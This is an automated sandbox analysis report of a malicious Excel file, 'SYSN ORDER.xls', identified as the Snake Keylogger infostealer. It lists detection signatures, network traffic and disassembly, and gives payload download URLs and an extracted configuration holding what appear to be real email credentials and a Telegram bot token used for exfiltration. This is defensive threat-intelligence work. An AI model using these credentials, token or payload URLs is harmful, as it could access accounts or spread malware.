Windows Analysis Report
SYSN ORDER.xls

Overview

General Information

Sample name: SYSN ORDER.xls
Analysis ID: 1522511
MD5: 673bd0aa988ca4a1ef05edb3d5b68d60
SHA1: 4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
SHA256: 9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
Tags: xlsuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
Multi AV Scanner detection for domain / URL
Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta Virustotal: Detection: 8% Perma Link
Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo Virustotal: Detection: 7% Perma Link
Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta... Virustotal: Detection: 7% Perma Link
Source: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC: Virustotal: Detection: 7% Perma Link
Source: http://172.245.123.6/770/dllhost.exes Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: SYSN ORDER.xls ReversingLabs: Detection: 21%
Source: SYSN ORDER.xls Virustotal: Detection: 25% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\dllhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SYSN ORDER.xls Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_003C5038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C7B81h 14_2_003C78C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C5D07h 14_2_003C5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C6691h 14_2_003C5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C8143h 14_2_003C7D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C6A01h 14_2_003C6741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C72C1h 14_2_003C7001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C8143h 14_2_003C8072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_003C584B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C6E61h 14_2_003C6BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 003C7721h 14_2_003C7461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_003C566A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CC729h 14_2_004CC480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C2889h 14_2_004C25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C46F1h 14_2_004C4448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C9711h 14_2_004C9468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C12D1h 14_2_004C1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CC2D1h 14_2_004CC028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C1B81h 14_2_004C18D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CCC15h 14_2_004CC8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C9B91h 14_2_004C98E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C4FA1h 14_2_004C4CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C1729h 14_2_004C1480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C4B49h 14_2_004C48A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C9FE9h 14_2_004C9D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C53F9h 14_2_004C5150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C1FD9h 14_2_004C1D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CA899h 14_2_004CA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C2431h 14_2_004C2188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CA441h 14_2_004CA198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 14_2_004C79AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C5851h 14_2_004C55A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CACF1h 14_2_004CAA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C5CA9h 14_2_004C5A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C2CE1h 14_2_004C2A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C3591h 14_2_004C32E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 14_2_004C7698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C3139h 14_2_004C2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CB149h 14_2_004CAEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C39E9h 14_2_004C3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C0A21h 14_2_004C0778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CBA21h 14_2_004CB778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C05C9h 14_2_004C0320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CB5CAh 14_2_004CB320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C0E79h 14_2_004C0BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004CBE79h 14_2_004CBBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C4299h 14_2_004C3FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004C3E41h 14_2_004C3B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 23_2_002D5038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D7B81h 23_2_002D78CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D5D07h 23_2_002D5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D6691h 23_2_002D5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D8143h 23_2_002D7D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D6A01h 23_2_002D6741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D72C1h 23_2_002D7001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D8143h 23_2_002D8072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 23_2_002D584B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D6E61h 23_2_002D6BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 002D7721h 23_2_002D7461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 23_2_002D566A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044C729h 23_2_0044C480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004446F1h 23_2_00444448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00449711h 23_2_00449468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004412D1h 23_2_00441028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044C2D1h 23_2_0044C028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00441B81h 23_2_004418D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044CC15h 23_2_0044C8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00449B91h 23_2_004498E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00444FA1h 23_2_00444CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00441729h 23_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00444B49h 23_2_004448A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00449FE9h 23_2_00449D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004453F9h 23_2_00445150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00441FD9h 23_2_00441D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00442889h 23_2_004425E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044A899h 23_2_0044A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00442431h 23_2_00442188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044A441h 23_2_0044A198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 23_2_004479AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00445851h 23_2_004455A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044ACF1h 23_2_0044AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00445CA9h 23_2_00445A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00442CE1h 23_2_00442A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00443591h 23_2_004432E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00443139h 23_2_00442E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 23_2_00447698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044B149h 23_2_0044AEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004439E9h 23_2_00443740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00440A21h 23_2_00440778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044BA21h 23_2_0044B778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 004405C9h 23_2_00440320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044B5CAh 23_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00440E79h 23_2_00440BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0044BE79h 23_2_0044BBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00444299h 23_2_00443FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00443E41h 23_2_00443B98
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: og1.in
Source: global traffic DNS query: name: og1.in
Source: global traffic DNS query: name: og1.in
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 132.226.8.169:80
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49191 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49193 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49195 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49197 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49199 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49201 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
